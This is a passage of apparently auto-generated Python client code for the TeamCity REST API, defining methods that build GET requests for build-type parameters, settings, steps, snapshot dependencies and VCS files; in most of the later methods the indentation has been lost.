    collection_formats = {}
    path_params = {}
    # TeamCityObject values contribute their locator id to the URL path.
    if 'path' in params:
        if isinstance(params['path'], TeamCityObject):
            path_params['path'] = params['path'].locator_id
        else:
            path_params['path'] = params['path']  # noqa: E501
    if 'bt_locator' in params:
        if isinstance(params['bt_locator'], TeamCityObject):
            path_params['btLocator'] = params['bt_locator'].locator_id
        else:
            path_params['btLocator'] = params['bt_locator']  # noqa: E501
    query_params = []
    if 'fields' in params:
        query_params.append(('fields', params['fields']))  # noqa: E501
    if 'resolve_parameters' in params:
        query_params.append(('resolveParameters', params['resolve_parameters']))  # noqa: E501
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # Authentication setting
    auth_settings = []  # noqa: E501
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/vcs/files/latest/metadata{path}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='File',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def __get_parameter_with_http_info(self, name, bt_locator, **kwargs):  # noqa: E501
    """get_parameter  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response.
    >>> thread = api.__get_parameter_with_http_info(name, bt_locator, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str name: (required)
    :param str bt_locator: (required)
    :param str fields:
    :return: ModelProperty
    If the method is called asynchronously,
    returns the request thread.
    """
    accepted = ('name', 'bt_locator', 'fields', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    # Reject any keyword the endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_parameter" % key
            )
    if name is None:
        raise ValueError("Missing the required parameter `name` when calling `get_parameter`")  # noqa: E501
    if bt_locator is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_parameter`")  # noqa: E501

    def _as_locator(value):
        # TeamCityObject instances contribute their locator id to the URL.
        return value.locator_id if isinstance(value, TeamCityObject) else value

    path_params = {
        'name': _as_locator(name),
        'btLocator': _as_locator(bt_locator),
    }
    query_params = [('fields', kwargs['fields'])] if 'fields' in kwargs else []
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/parameters/{name}', 'GET',
        path_params,
        query_params,
        {},
        body=None,
        post_params=[],
        files={},
        response_type='ModelProperty',  # noqa: E501
        auth_settings=[],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def __get_parameter_0_with_http_info(self, name, bt_locator, **kwargs):  # noqa: E501
    """get_parameter_0  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response.
    >>> thread = api.__get_parameter_0_with_http_info(name, bt_locator, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str name: (required)
    :param str bt_locator: (required)
    :param str fields:
    :return: ModelProperty
    If the method is called asynchronously,
    returns the request thread.
    """
    accepted = ('name', 'bt_locator', 'fields', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    # Reject any keyword the endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_parameter_0" % key
            )
    if name is None:
        raise ValueError("Missing the required parameter `name` when calling `get_parameter_0`")  # noqa: E501
    if bt_locator is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_parameter_0`")  # noqa: E501

    def _as_locator(value):
        # TeamCityObject instances contribute their locator id to the URL.
        return value.locator_id if isinstance(value, TeamCityObject) else value

    path_params = {
        'name': _as_locator(name),
        'btLocator': _as_locator(bt_locator),
    }
    query_params = [('fields', kwargs['fields'])] if 'fields' in kwargs else []
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/settings/{name}', 'GET',
        path_params,
        query_params,
        {},
        body=None,
        post_params=[],
        files={},
        response_type='ModelProperty',  # noqa: E501
        auth_settings=[],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def __get_parameter_type_with_http_info(self, name, bt_locator, **kwargs):  # noqa: E501
    """get_parameter_type  # noqa: E501
    Synchronous by default; pass async_req=True to receive the request
    thread instead of the response.
    >>> thread = api.__get_parameter_type_with_http_info(name, bt_locator, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str name: (required)
    :param str bt_locator: (required)
    :return: Type
    If the method is called asynchronously,
    returns the request thread.
    """
    accepted = ('name', 'bt_locator', 'async_req',
                '_return_http_data_only', '_preload_content',
                '_request_timeout')
    # Reject any keyword the endpoint does not understand.
    for key in kwargs:
        if key not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_parameter_type" % key
            )
    if name is None:
        raise ValueError("Missing the required parameter `name` when calling `get_parameter_type`")  # noqa: E501
    if bt_locator is None:
        raise ValueError("Missing the required parameter `bt_locator` when calling `get_parameter_type`")  # noqa: E501

    def _as_locator(value):
        # TeamCityObject instances contribute their locator id to the URL.
        return value.locator_id if isinstance(value, TeamCityObject) else value

    path_params = {
        'name': _as_locator(name),
        'btLocator': _as_locator(bt_locator),
    }
    return self.api_client.call_api(
        '/app/rest/buildTypes/{btLocator}/parameters/{name}/type', 'GET',
        path_params,
        [],
        {},
        body=None,
        post_params=[],
        files={},
        response_type='Type',  # noqa: E501
        auth_settings=[],
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def __get_parameter_type_raw_value_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""get_parameter_type_raw_value # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_parameter_type_raw_value_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_parameter_type_raw_value" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_parameter_type_raw_value`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_parameter_type_raw_value`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters/{name}/type/rawValue', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_parameter_value_long_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""get_parameter_value_long # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_parameter_value_long_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_parameter_value_long" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_parameter_value_long`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_parameter_value_long`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters/{name}/value', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_parameter_value_long_0_with_http_info(self, name, bt_locator, **kwargs): # noqa: E501
"""get_parameter_value_long_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_parameter_value_long_0_with_http_info(name, bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: (required)
:param str bt_locator: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_parameter_value_long_0" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_parameter_value_long_0`") # noqa: E501
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_parameter_value_long_0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
if isinstance(params['name'], TeamCityObject):
path_params['name'] = params['name'].locator_id
else:
path_params['name'] = params['name'] # noqa: E501
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/settings/{name}/value', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_parameters_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_parameters_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str locator:
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_parameters" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_parameters`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/parameters', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Properties', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_parameters_0_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_parameters_0 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_parameters_0_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str locator:
:param str fields:
:return: Properties
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_parameters_0" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_parameters_0`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/settings', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Properties', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_requirement_setting_with_http_info(self, bt_locator, agent_requirement_locator, field_name, **kwargs): # noqa: E501
"""get_requirement_setting # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_requirement_setting_with_http_info(bt_locator, agent_requirement_locator, field_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str agent_requirement_locator: (required)
:param str field_name: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'agent_requirement_locator', 'field_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_requirement_setting" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_requirement_setting`") # noqa: E501
# verify the required parameter 'agent_requirement_locator' is set
if ('agent_requirement_locator' not in params or
params['agent_requirement_locator'] is None):
raise ValueError("Missing the required parameter `agent_requirement_locator` when calling `get_requirement_setting`") # noqa: E501
# verify the required parameter 'field_name' is set
if ('field_name' not in params or
params['field_name'] is None):
raise ValueError("Missing the required parameter `field_name` when calling `get_requirement_setting`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'agent_requirement_locator' in params:
if isinstance(params['agent_requirement_locator'], TeamCityObject):
path_params['agentRequirementLocator'] = params['agent_requirement_locator'].locator_id
else:
path_params['agentRequirementLocator'] = params['agent_requirement_locator'] # noqa: E501
if 'field_name' in params:
if isinstance(params['field_name'], TeamCityObject):
path_params['fieldName'] = params['field_name'].locator_id
else:
path_params['fieldName'] = params['field_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/agent-requirements/{agentRequirementLocator}/{fieldName}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_root_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_root # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_root_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str base_path:
:param str locator:
:param str fields:
:param bool resolve_parameters:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'base_path', 'locator', 'fields', 'resolve_parameters'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_root" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_root`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'base_path' in params:
query_params.append(('basePath', params['base_path'])) # noqa: E501
if 'locator' in params:
query_params.append(('locator', params['locator'])) # noqa: E501
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
if 'resolve_parameters' in params:
query_params.append(('resolveParameters', params['resolve_parameters'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/vcs/files/latest', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Files', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_settings_file_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_settings_file # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_settings_file_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_settings_file" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_settings_file`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/settingsFile', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_snapshot_dep_with_http_info(self, bt_locator, snapshot_dep_locator, **kwargs): # noqa: E501
"""get_snapshot_dep # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_snapshot_dep_with_http_info(bt_locator, snapshot_dep_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str snapshot_dep_locator: (required)
:param str fields:
:return: SnapshotDependency
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'snapshot_dep_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_snapshot_dep" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_snapshot_dep`") # noqa: E501
# verify the required parameter 'snapshot_dep_locator' is set
if ('snapshot_dep_locator' not in params or
params['snapshot_dep_locator'] is None):
raise ValueError("Missing the required parameter `snapshot_dep_locator` when calling `get_snapshot_dep`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'snapshot_dep_locator' in params:
if isinstance(params['snapshot_dep_locator'], TeamCityObject):
path_params['snapshotDepLocator'] = params['snapshot_dep_locator'].locator_id
else:
path_params['snapshotDepLocator'] = params['snapshot_dep_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/snapshot-dependencies/{snapshotDepLocator}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotDependency', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_snapshot_deps_with_http_info(self, bt_locator, **kwargs): # noqa: E501
"""get_snapshot_deps # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_snapshot_deps_with_http_info(bt_locator, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str fields:
:return: SnapshotDependencies
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_snapshot_deps" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_snapshot_deps`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/snapshot-dependencies', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotDependencies', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_step_with_http_info(self, bt_locator, step_id, **kwargs): # noqa: E501
"""get_step # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_step_with_http_info(bt_locator, step_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str step_id: (required)
:param str fields:
:return: Step
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'step_id', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_step" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_step`") # noqa: E501
# verify the required parameter 'step_id' is set
if ('step_id' not in params or
params['step_id'] is None):
raise ValueError("Missing the required parameter `step_id` when calling `get_step`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'step_id' in params:
if isinstance(params['step_id'], TeamCityObject):
path_params['stepId'] = params['step_id'].locator_id
else:
path_params['stepId'] = params['step_id'] # noqa: E501
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/buildTypes/{btLocator}/steps/{stepId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Step', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_step_parameter_with_http_info(self, bt_locator, step_id, parameter_name, **kwargs): # noqa: E501
"""get_step_parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_step_parameter_with_http_info(bt_locator, step_id, parameter_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str bt_locator: (required)
:param str step_id: (required)
:param str parameter_name: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['bt_locator', 'step_id', 'parameter_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_step_parameter" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'bt_locator' is set
if ('bt_locator' not in params or
params['bt_locator'] is None):
raise ValueError("Missing the required parameter `bt_locator` when calling `get_step_parameter`") # noqa: E501
# verify the required parameter 'step_id' is set
if ('step_id' not in params or
params['step_id'] is None):
raise ValueError("Missing the required parameter `step_id` when calling `get_step_parameter`") # noqa: E501
# verify the required parameter 'parameter_name' is set
if ('parameter_name' not in params or
params['parameter_name'] is None):
raise ValueError("Missing the required parameter `parameter_name` when calling `get_step_parameter`") # noqa: E501
collection_formats = {}
path_params = {}
if 'bt_locator' in params:
if isinstance(params['bt_locator'], TeamCityObject):
path_params['btLocator'] = params['bt_locator'].locator_id
else:
path_params['btLocator'] = params['bt_locator'] # noqa: E501
if 'step_id' in params:
if isinstance(params['step_id'], TeamCityObject):
path_params['stepId'] = params['step_id'].locator_id
else:
path_params['stepId'] = params['step_id'] # noqa: E501
if 'parameter_name' in params:
